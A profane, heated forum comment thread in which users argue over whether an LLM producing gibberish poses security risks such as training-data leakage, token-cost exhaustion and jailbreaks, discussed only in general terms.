• @[email protected]
    link
    fedilink
    English
    8
    edit-2
    2 months ago

    it “speaking gibberish” is not the problem. the answer to your question is literally in the third paragraph in the article.

    if you do not comprehend what it references or implies, then (quite seriously) if you are in any way involved in any security shit get the fuck out. alternatively read up some history about, well, literally any actual technical detail of even lightly technical systems hacking. and that’s about as much free advice as I’m gonna give you.

    • @0laura
      link
      English
      -7
      edit-2
      2 months ago

      Removed by mod

      • @[email protected]
        link
        fedilink
        English
        172 months ago

        Genuine question.

        So rude, you didn’t answer my question at all.

        yeah find me one single instance of someone doing this “genuine question” shit that doesn’t result in the most bad faith interpretation possible of the answers they get

        If I’m missing something obvious I’d love it if you told me.

        • most security vulnerabilities look like they cause the targeted program to spew gibberish, until they’re crafted into a more targeted attack
        • it’s likely that gibberish is the LLM’s training data, where companies are increasingly being encouraged to store sensitive data
        • there’s also a trivial resource exhaustion attack where you have one or more LLMs spew garbage until they’ve either exhausted their paid-for allocation of tokens or cost their hosting organization a relative fuckload of cash
        • either you knew all of the above already and just came here to be a shithead, or you’re the type of shithead who doesn’t know fuck about computer security but still likes to argue about it
        • fuck off
        • @[email protected]
          link
          fedilink
          English
          92 months ago

          the amount of times I’ve had to clean shit up after someone like this “didn’t think $x would matter”…

        • @0laura
          link
          English
          02 months ago

          If people put sensitive stuff in the training data then that’s where the security issue comes from. If people allow the AIs output to do dangerous stuff then that’s where the security issue comes from. I thought it’s common sense to expect everything an LLM has access to to be considered publicly accessible. Saying AI speaking gibberish is a security flaw is a bit like saying you can drown in the ocean to me. Of course, thats how it works.

      • @[email protected]
        link
        fedilink
        English
        132 months ago

        so you start by claiming that you don’t think there’s any problematic security potential, follow it up by clarifying that you actually have no fucking understanding of how any of it could work and might matter, and then you get annoyed at the response? so rude, indeed!

          • @[email protected]
            link
            fedilink
            English
            132 months ago

            you know what

            I’ll do you the courtesy of an even mildly thorough response, despite the fact that this is not the place and that it’s not my fucking job

            one of the literal pillars of security intrusions/research/breakthroughs is in the field of exploiting side effects. as recently as 3 days ago there was some new stuff published about a fun and ridiculous way to do such things. and that kind of thing can be done in far more types of environments than you’d guess. people have managed large-scale intrusions/events by the simple matter of getting their hands on a teensy little fucking bit of string.

            there are many ways this shit can be abused. and now I’m going to stop replying to this section, on which I’ve already said more than enough.

            • @0laura
              link
              English
              02 months ago

              If u give ai the ability to do anything dangerous then thats ur problem, not the ai possibly doing those things. the DAN stuff has been there from the very beginning and i doubt itll ever fully go away, it shouldnt be considered a security risk imo.